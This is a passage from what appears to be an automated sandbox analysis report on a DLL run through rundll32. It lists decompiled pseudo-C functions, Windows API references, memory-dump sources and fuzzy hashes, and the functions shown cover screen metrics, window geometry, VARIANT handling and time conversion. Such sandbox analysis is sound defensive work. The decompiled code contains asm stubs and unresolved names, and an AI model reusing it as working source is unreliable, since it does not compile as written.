                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreate$Open
                                                                        • String ID: software
                                                                        • API String ID: 1740278721-2010147023
                                                                        • Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                        • Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
                                                                        • Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                        • Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
                                                                        				void _v20;
                                                                        				int _t14;
                                                                        				int _t18;
                                                                        				intOrPtr* _t23;
                                                                        
                                                                        				if(E1000799F() == 0) {
                                                                        					if(_a4 != 0x12340042) {
                                                                        						L9:
                                                                        						_t14 = 0;
                                                                        						L10:
                                                                        						return _t14;
                                                                        					}
                                                                        					_t23 = _a8;
                                                                        					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                        						goto L9;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                        						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                        						_t18 = GetSystemMetrics(1);
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						 *(_t23 + 0x10) = _t18;
                                                                        						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                        						if( *_t23 >= 0x48) {
                                                                        							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
                                                                        						}
                                                                        						_t14 = 1;
                                                                        						goto L10;
                                                                        					}
                                                                        				}
                                                                        				return  *0x1004ee08(_a4, _a8);
                                                                        			}








                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
                                                                        • GetSystemMetrics.USER32 ref: 10007BA6
                                                                        • GetSystemMetrics.USER32 ref: 10007BAD
                                                                        • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                        • String ID: B$DISPLAY
                                                                        • API String ID: 2307409384-3316187204
                                                                        • Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                        • Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
                                                                        • Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                        • Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10020D8D
                                                                        • GetWindowRect.USER32 ref: 10020DA8
                                                                        • ScreenToClient.USER32 ref: 10020DBB
                                                                        • ScreenToClient.USER32 ref: 10020DC4
                                                                        • EqualRect.USER32 ref: 10020DCE
                                                                        • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                        • String ID:
                                                                        • API String ID: 443303494-0
                                                                        • Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                        • Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
                                                                        • Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                        • Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E1000ECE8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t155;
                                                                        				signed int _t167;
                                                                        				signed short _t168;
                                                                        				intOrPtr* _t170;
                                                                        				void* _t172;
                                                                        				signed short _t181;
                                                                        				signed short _t183;
                                                                        				void* _t186;
                                                                        				signed short _t189;
                                                                        				signed short _t191;
                                                                        				signed short _t196;
                                                                        				signed short _t198;
                                                                        				signed short _t207;
                                                                        				long long* _t214;
                                                                        				intOrPtr* _t218;
                                                                        				void* _t220;
                                                                        				void* _t226;
                                                                        				void* _t229;
                                                                        				intOrPtr* _t231;
                                                                        				void* _t237;
                                                                        				void* _t240;
                                                                        				signed int _t243;
                                                                        				signed short _t244;
                                                                        				signed short _t245;
                                                                        				signed short _t249;
                                                                        				signed short _t253;
                                                                        				intOrPtr* _t254;
                                                                        				intOrPtr _t276;
                                                                        				void* _t318;
                                                                        				intOrPtr* _t326;
                                                                        				void* _t327;
                                                                        				signed long long _t335;
                                                                        
                                                                        				_t318 = __edx;
                                                                        				E10011BF0(0x1003b04c, _t327);
                                                                        				_t155 =  *0x1004c470; // 0x1bfbe703
                                                                        				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
                                                                        				 *(_t327 - 0x30) = 0;
                                                                        				E10010592(_t327 - 0x40);
                                                                        				_t321 =  *((intOrPtr*)(__ecx + 0x54));
                                                                        				 *((intOrPtr*)(_t327 - 4)) = 0;
                                                                        				E1000C8EB( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
                                                                        				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
                                                                        				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B5EA(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
                                                                        					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
                                                                        					__imp__#9(_t327 - 0x40);
                                                                        				} else {
                                                                        					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
                                                                        					_t326 = __imp__#9;
                                                                        					__eflags = _t167 - 0x81;
                                                                        					if(__eflags > 0) {
                                                                        						_t168 = _t167 - 0x82;
                                                                        						__eflags = _t168;
                                                                        						if(__eflags == 0) {
                                                                        							goto L47;
                                                                        						} else {
                                                                        							_t181 = _t168 - 1;
                                                                        							__eflags = _t181;
                                                                        							if(__eflags == 0) {
                                                                        								_t183 = E1000C669(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
                                                                        								__eflags = _t183;
                                                                        								if(_t183 != 0) {
                                                                        									__eflags =  *(_t327 - 0x23);
                                                                        									asm("fild qword [ebp-0x21]");
                                                                        									if( *(_t327 - 0x23) > 0) {
                                                                        										do {
                                                                        											_t129 = _t327 - 0x23;
                                                                        											 *_t129 =  *(_t327 - 0x23) - 1;
                                                                        											__eflags =  *_t129;
                                                                        											_t335 = _t335 *  *0x10040908;
                                                                        										} while ( *_t129 != 0);
                                                                        									}
                                                                        									__eflags =  *(_t327 - 0x22);
                                                                        									if( *(_t327 - 0x22) == 0) {
                                                                        										_t335 = st0;
                                                                        										asm("fchs");
                                                                        										st1 = _t335;
                                                                        									}
                                                                        									 *(_t327 - 0x78) = _t335;
                                                                        									 *((short*)(_t327 - 0x80)) = 5;
                                                                        									 *((char*)(_t327 - 4)) = 0xe;
                                                                        									E10010578(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
                                                                        									_t186 = _t327 - 0x80;
                                                                        									goto L36;
                                                                        								}
                                                                        							} else {
                                                                        								_t189 = _t181;
                                                                        								__eflags = _t189;
                                                                        								if(__eflags == 0) {
                                                                        									_t191 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
                                                                        									__eflags = _t191;
                                                                        									if(_t191 != 0) {
                                                                        										asm("fldz");
                                                                        										 *(_t327 - 0x20) = _t335;
                                                                        										 *((intOrPtr*)(_t327 - 0x18)) = 0;
                                                                        										E1000B521(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
                                                                        										 *((short*)(_t327 - 0x70)) = 7;
                                                                        										 *(_t327 - 0x68) =  *(_t327 - 0x20);
                                                                        										 *((char*)(_t327 - 4)) = 0xf;
                                                                        										E10010578(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
                                                                        										_t186 = _t327 - 0x70;
                                                                        										goto L36;
                                                                        									}
                                                                        								} else {
                                                                        									_t196 = _t189 - 1;
                                                                        									__eflags = _t196;
                                                                        									if(__eflags == 0) {
                                                                        										_t198 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
                                                                        										__eflags = _t198;
                                                                        										if(_t198 != 0) {
                                                                        											asm("fldz");
                                                                        											 *(_t327 - 0x20) = _t335;
                                                                        											 *((intOrPtr*)(_t327 - 0x18)) = 0;
                                                                        											E1000B582( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
                                                                        											 *((short*)(_t327 - 0xb0)) = 7;
                                                                        											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
                                                                        											 *((char*)(_t327 - 4)) = 0x10;
                                                                        											E10010578(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
                                                                        											_t186 = _t327 - 0xb0;
                                                                        											goto L36;
                                                                        										}
                                                                        									} else {
                                                                        										__eflags = _t196 - 1;
                                                                        										if(__eflags == 0) {
                                                                        											_t207 = E1000C6BD(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
                                                                        											__eflags = _t207;
                                                                        											if(_t207 != 0) {
                                                                        												_t214 = E1000C853(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
                                                                        												 *((short*)(_t327 - 0xa0)) = 7;
                                                                        												 *((long long*)(_t327 - 0x98)) =  *_t214;
                                                                        												 *((char*)(_t327 - 4)) = 0x11;
                                                                        												E10010578(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
                                                                        												_t186 = _t327 - 0xa0;
                                                                        												goto L36;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(__eflags == 0) {
                                                                        							_t218 = E10006B11(_t327 + 0xc, __eflags);
                                                                        							 *((char*)(_t327 - 4)) = 2;
                                                                        							_t220 = E100105C5(_t327 - 0x120,  *_t218, 8);
                                                                        							 *((char*)(_t327 - 4)) = 3;
                                                                        							E10010578(_t220, _t327 - 0x40, _t220);
                                                                        							 *_t326(_t327 - 0x120, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                        							_t276 =  *((intOrPtr*)(_t327 + 0xc));
                                                                        							goto L48;
                                                                        						} else {
                                                                        							__eflags = _t167 - 8;
                                                                        							if(__eflags > 0) {
                                                                        								__eflags = _t167 - 0xb;
                                                                        								if(__eflags == 0) {
                                                                        									_t226 = E100104C1(_t327 - 0x100,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
                                                                        									 *((char*)(_t327 - 4)) = 0xb;
                                                                        									E10010578(_t226, _t327 - 0x40, _t226);
                                                                        									_t186 = _t327 - 0x100;
                                                                        									goto L36;
                                                                        								} else {
                                                                        									__eflags = _t167 - 0xc;
                                                                        									if(__eflags == 0) {
                                                                        										_t229 = E100105A5(_t327 - 0xf0, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                        										 *((char*)(_t327 - 4)) = 1;
                                                                        										E10010578(_t229, _t327 - 0x40, _t229);
                                                                        										_t186 = _t327 - 0xf0;
                                                                        										goto L36;
                                                                        									} else {
                                                                        										__eflags = _t167 - 0xf;
                                                                        										if(_t167 > 0xf) {
                                                                        											__eflags = _t167 - 0x11;
                                                                        											if(__eflags <= 0) {
                                                                        												_t231 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
                                                                        												 *((short*)(_t327 - 0x60)) = 0x11;
                                                                        												 *((char*)(_t327 - 0x58)) =  *_t231;
                                                                        												 *((char*)(_t327 - 4)) = 6;
                                                                        												E10010578(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
                                                                        												_t186 = _t327 - 0x60;
                                                                        												goto L36;
                                                                        											} else {
                                                                        												__eflags = _t167 - 0x12;
                                                                        												if(__eflags == 0) {
                                                                        													goto L24;
                                                                        												} else {
                                                                        													__eflags = _t167 - 0x13;
                                                                        													if(__eflags == 0) {
                                                                        														goto L23;
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								if(__eflags == 0) {
                                                                        									L47:
                                                                        									_t170 = E1000E754(_t327 - 0x28, __eflags);
                                                                        									 *((char*)(_t327 - 4)) = 4;
                                                                        									_t172 = E100105C5(_t327 - 0x130,  *_t170, 8);
                                                                        									 *((char*)(_t327 - 4)) = 5;
                                                                        									E10010578(_t172, _t327 - 0x40, _t172);
                                                                        									 *_t326(_t327 - 0x130, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                        									_t276 =  *((intOrPtr*)(_t327 - 0x28));
                                                                        									L48:
                                                                        									__eflags = _t276 + 0xfffffff0;
                                                                        									 *((char*)(_t327 - 4)) = 0;
                                                                        									E100014B0(_t276 + 0xfffffff0, _t318);
                                                                        								} else {
                                                                        									_t243 = _t167;
                                                                        									__eflags = _t243;
                                                                        									if(__eflags == 0) {
                                                                        										L24:
                                                                        										_t237 = E100104C1(_t327 - 0x110,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
                                                                        										 *((char*)(_t327 - 4)) = 7;
                                                                        										E10010578(_t237, _t327 - 0x40, _t237);
                                                                        										_t186 = _t327 - 0x110;
                                                                        										goto L36;
                                                                        									} else {
                                                                        										_t244 = _t243 - 1;
                                                                        										__eflags = _t244;
                                                                        										if(__eflags == 0) {
                                                                        											L23:
                                                                        											_t240 = E100104E8(_t327 - 0xe0,  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
                                                                        											 *((char*)(_t327 - 4)) = 8;
                                                                        											E10010578(_t240, _t327 - 0x40, _t240);
                                                                        											_t186 = _t327 - 0xe0;
                                                                        											goto L36;
                                                                        										} else {
                                                                        											_t245 = _t244 - 1;
                                                                        											__eflags = _t245;
                                                                        											if(__eflags == 0) {
                                                                        												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                        												 *((short*)(_t327 - 0xc0)) = 4;
                                                                        												 *((char*)(_t327 - 4)) = 9;
                                                                        												E10010578(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
                                                                        												_t186 = _t327 - 0xc0;
                                                                        												goto L36;
                                                                        											} else {
                                                                        												_t249 = _t245 - 1;
                                                                        												__eflags = _t249;
                                                                        												if(__eflags == 0) {
                                                                        													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                        													 *((short*)(_t327 - 0x90)) = 5;
                                                                        													 *((char*)(_t327 - 4)) = 0xa;
                                                                        													E10010578(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
                                                                        													_t186 = _t327 - 0x90;
                                                                        													goto L36;
                                                                        												} else {
                                                                        													_t253 = _t249 - 1;
                                                                        													__eflags = _t253;
                                                                        													if(__eflags == 0) {
                                                                        														_t254 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
                                                                        														 *((short*)(_t327 - 0x50)) = 6;
                                                                        														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
                                                                        														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
                                                                        														 *((char*)(_t327 - 4)) = 0xd;
                                                                        														E10010578(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
                                                                        														_t186 = _t327 - 0x50;
                                                                        														goto L36;
                                                                        													} else {
                                                                        														__eflags = _t253 - 1;
                                                                        														if(__eflags == 0) {
                                                                        															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                        															 *((short*)(_t327 - 0xd0)) = 7;
                                                                        															 *((char*)(_t327 - 4)) = 0xc;
                                                                        															E10010578(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
                                                                        															_t186 = _t327 - 0xd0;
                                                                        															L36:
                                                                        															 *((char*)(_t327 - 4)) = 0;
                                                                        															 *_t326(_t186);
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
                                                                        					 *_t326(_t327 - 0x40);
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
                                                                        				return E100117AE( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
                                                                        			}

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000ECED
                                                                        • VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                        • VariantClear.OLEAUT32(00000007), ref: 1000F07D
                                                                        • VariantClear.OLEAUT32(?), ref: 1000F1F2
                                                                          • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                          • Part of subcall function 1000B521: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B56F
                                                                        • VariantClear.OLEAUT32(?), ref: 1000F1D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                        • String ID:
                                                                        • API String ID: 2075586698-0
                                                                        • Opcode ID: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                        • Instruction ID: ab9c67d837f040e6a8d2bcef4c04a3746811f2ad7d73440ecc3fc71fc0b20bfc
                                                                        • Opcode Fuzzy Hash: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                        • Instruction Fuzzy Hash: 3FE16D74D0055CEAEF15DBA0C890AFEB7B9FF08380F04409AF845A7195DB74AE49EB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 100304C6: PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                          • Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
                                                                          • Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
                                                                          • Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                          • Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                          • Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                          • Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                        • GetWindowRect.USER32 ref: 10030BDC
                                                                          • Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                          • Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                        • GetWindowRect.USER32 ref: 10030CA6
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030D5E
                                                                          • Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
                                                                          • Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
                                                                          • Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
                                                                          • Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E
                                                                        • GetWindowRect.USER32 ref: 10030D79
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030E61
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030E74
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                        • String ID:
                                                                        • API String ID: 2136250054-0
                                                                        • Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                        • Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
                                                                        • Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                        • Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t62;
                                                                        				intOrPtr* _t63;
                                                                        				intOrPtr* _t65;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t68;
                                                                        				void* _t69;
                                                                        				intOrPtr _t71;
                                                                        				void* _t72;
                                                                        				intOrPtr _t74;
                                                                        				char _t75;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t86;
                                                                        				intOrPtr _t90;
                                                                        				intOrPtr* _t92;
                                                                        				intOrPtr _t94;
                                                                        				intOrPtr _t101;
                                                                        				intOrPtr _t102;
                                                                        				char _t105;
                                                                        				signed int _t111;
                                                                        				intOrPtr _t113;
                                                                        				intOrPtr _t118;
                                                                        				intOrPtr* _t121;
                                                                        				void* _t127;
                                                                        				intOrPtr _t128;
                                                                        				intOrPtr* _t129;
                                                                        				intOrPtr _t132;
                                                                        				void* _t134;
                                                                        				intOrPtr _t136;
                                                                        				intOrPtr _t138;
                                                                        
                                                                        				_t118 = __edx;
                                                                        				_t121 = _a4;
                                                                        				_t101 =  *((intOrPtr*)(_t121 + 4));
                                                                        				_t62 =  *_t121;
                                                                        				_t132 = _t101;
                                                                        				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
                                                                        					L29:
                                                                        					_t63 = 0;
                                                                        					__eflags = 0;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t134 = _t101 - 0x1000;
                                                                        					if(_t134 > 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					if(_t134 < 0) {
                                                                        						L6:
                                                                        						_push(_t127);
                                                                        						E100193FB(_t127, _t135);
                                                                        						_t102 =  *((intOrPtr*)(_t121 + 4));
                                                                        						_t136 = _t102;
                                                                        						_t128 =  *_t121;
                                                                        						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
                                                                        							_t65 = E10018BEF(_t121);
                                                                        							__eflags =  *0x1004cdec; // 0x1
                                                                        							_t129 = _t65;
                                                                        							if(__eflags == 0) {
                                                                        								L15:
                                                                        								asm("cdq");
                                                                        								_t67 =  *0x1004cde8; // 0x7080
                                                                        								_t123 = _t118;
                                                                        								asm("cdq");
                                                                        								_t105 =  *_t129 - _t67;
                                                                        								__eflags = _t105;
                                                                        								asm("sbb edi, edx");
                                                                        								_v12 = _t105;
                                                                        								_v8 = _t118;
                                                                        								L16:
                                                                        								_t68 = E10019490(_t105, _t123, 0x3c, 0);
                                                                        								__eflags = _t68;
                                                                        								 *_t129 = _t68;
                                                                        								if(_t68 < 0) {
                                                                        									 *_t129 = _t68 + 0x3c;
                                                                        									_v12 = _v12 + 0xffffffc4;
                                                                        									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                        								}
                                                                        								_t69 = E10013780(_v12, _v8, 0x3c, 0);
                                                                        								asm("cdq");
                                                                        								asm("adc edi, edx");
                                                                        								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
                                                                        								_v8 = _t118;
                                                                        								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
                                                                        								__eflags = _t71;
                                                                        								 *((intOrPtr*)(_t129 + 4)) = _t71;
                                                                        								if(_t71 < 0) {
                                                                        									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
                                                                        									_v12 = _v12 + 0xffffffc4;
                                                                        									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                        								}
                                                                        								_t72 = E10013780(_v12, _v8, 0x3c, 0);
                                                                        								asm("cdq");
                                                                        								asm("adc edi, edx");
                                                                        								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
                                                                        								_v8 = _t118;
